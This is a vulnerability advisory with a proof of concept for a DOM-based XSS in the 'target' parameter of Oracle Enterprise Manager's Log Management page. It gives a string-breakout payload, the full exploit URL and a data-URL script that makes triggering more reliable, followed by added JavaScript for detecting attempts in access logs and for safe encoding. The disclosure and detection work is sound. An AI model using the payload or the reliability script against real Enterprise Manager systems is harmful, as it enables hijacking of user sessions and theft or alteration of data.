CVE ID: CVE-2024-20917
Title: DOM-Based Cross Site Scripting in the `target` parameter in the Log Management component
CVSS Score: 7.5 (High)
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:L
Product: Oracle Enterprise Manager
Version: 13.5.0.14
Credits: Patryk Rejchert and Piotr Konopko
A DOM-Based Cross Site Scripting vulnerability exists in the `target` GET parameter of the Log Management component of Oracle Enterprise Manager Base Platform version 13.5.0.0. This vulnerability allows an unauthenticated attacker with network access via HTTP to compromise the OEM Base Platform. A specially crafted URL can trigger an XSS attack, requiring the victim to interact by clicking on the malicious link. This can result in the modification or exfiltration of data from the affected application.
While testing the vulnerability, it turned out that the message containing the injected code did not always show up. For the vulnerability to trigger, the parameter value has to differ from the one used in the previous request.
In order to reproduce the vulnerability, the following payload should be placed in the `target` parameter:
%27-alert(%27XSS%27)-%27
The whole URL will look like this:
https://<host>/em/faces/logmgmt/msgs/logMessages?type=j2ee_application_domain&target=%27-alert(%27XSS%27)-%27
The problem of the injected message not always showing up can be worked around with a script that opens the page and then changes the parameter value once it has loaded:
data:text/html,<script>addEventListener('click', () => {x = open("https://<host>/em/faces/logmgmt/msgs/logMessages?type=j2ee_application_domain&target='-alert(document.domain)-'"); setTimeout(()=>{x.location="https://<host>/em/faces/logmgmt/msgs/logMessages?type=j2ee_application_domain&target='-alert(document.domain)-'a"},2000)});</script>
However, this approach requires an additional click on the page hosting the script.
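From the defender's side, the payload above breaks out of a JavaScript string literal, so exploitation attempts are recognisable in web-server access logs by quote, backslash, angle-bracket or parenthesis characters in the `target` parameter of the Log Management endpoint. The following is an added example, not code from the advisory or from Oracle; it assumes combined-format access logs, constructed sample lines, and a placeholder base host, and also shows the encoding a page should apply before embedding a value inside a script.

```javascript
// Added example, not code from the advisory or from Oracle: flags requests whose
// `target` parameter on the Log Management endpoint carries characters that break
// out of a JavaScript string literal (the context the '-alert('XSS')-' payload
// implies), and shows the encoding a page should apply before embedding a value.
const LOGMGMT_PATH = "/em/faces/logmgmt/msgs/logMessages";

// A legitimate target name should never need quotes, backslashes, angle brackets
// or parentheses; tune this class to the names used in your deployment.
const BREAKOUT = /['"\\<>()]/;

// Returns the decoded `target` value when the request hits the Log Management
// endpoint and the value contains breakout characters, otherwise null.
function suspiciousTarget(requestUrl) {
  let url;
  try { url = new URL(requestUrl, "https://placeholder.invalid"); } catch { return null; }
  if (url.pathname !== LOGMGMT_PATH) return null;
  let value = url.searchParams.get("target"); // already percent-decoded once
  if (value === null) return null;
  for (let i = 0; i < 3; i++) { // collapse double/triple encoding, bounded
    try { const d = decodeURIComponent(value); if (d === value) break; value = d; } catch { break; }
  }
  return BREAKOUT.test(value) ? value : null;
}

// Scans access-log lines in combined format and returns the offending values.
function scanAccessLog(lines) {
  const hits = [];
  for (const line of lines) {
    const m = line.match(/"(?:GET|POST) (\S+) HTTP\//);
    if (m) { const t = suspiciousTarget(m[1]); if (t !== null) hits.push(t); }
  }
  return hits;
}

// Safe embedding: a JSON string literal, with the characters JSON leaves alone
// but that still close a <script> block or act as line terminators escaped too.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c").replace(/>/g, "\\u003e")
    .replace(/\u2028/g, "\\u2028").replace(/\u2029/g, "\\u2029");
}

// Constructed sample log lines (hypothetical hosts and timestamps), not real traffic.
const SAMPLE_LOG = [
  '10.0.0.5 - - [30/Sep/2025:10:00:01 +0000] "GET /em/faces/logmgmt/msgs/logMessages?type=j2ee_application_domain&target=MyDomain HTTP/1.1" 200 512',
  '10.0.0.9 - - [30/Sep/2025:10:00:02 +0000] "GET /em/faces/logmgmt/msgs/logMessages?type=j2ee_application_domain&target=%27-alert(%27XSS%27)-%27 HTTP/1.1" 200 512',
  '10.0.0.9 - - [30/Sep/2025:10:00:03 +0000] "GET /em/faces/logmgmt/msgs/logMessages?type=j2ee_application_domain&target=%27-alert(%27XSS%27)-%27a HTTP/1.1" 200 512',
  '10.0.0.7 - - [30/Sep/2025:10:00:04 +0000] "GET /em/faces/other?target=%27x%27 HTTP/1.1" 200 100',
];

console.log(scanAccessLog(SAMPLE_LOG));
```

The two consecutive hits from the same client with values differing only by a trailing character match the reliability trick described above, which is a useful correlation signal on its own.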
- 12-06-2023 - Vulnerability reported to the vendor
- 16-01-2024 - Security advisory published by the vendor
- 30-09-2025 - PoC published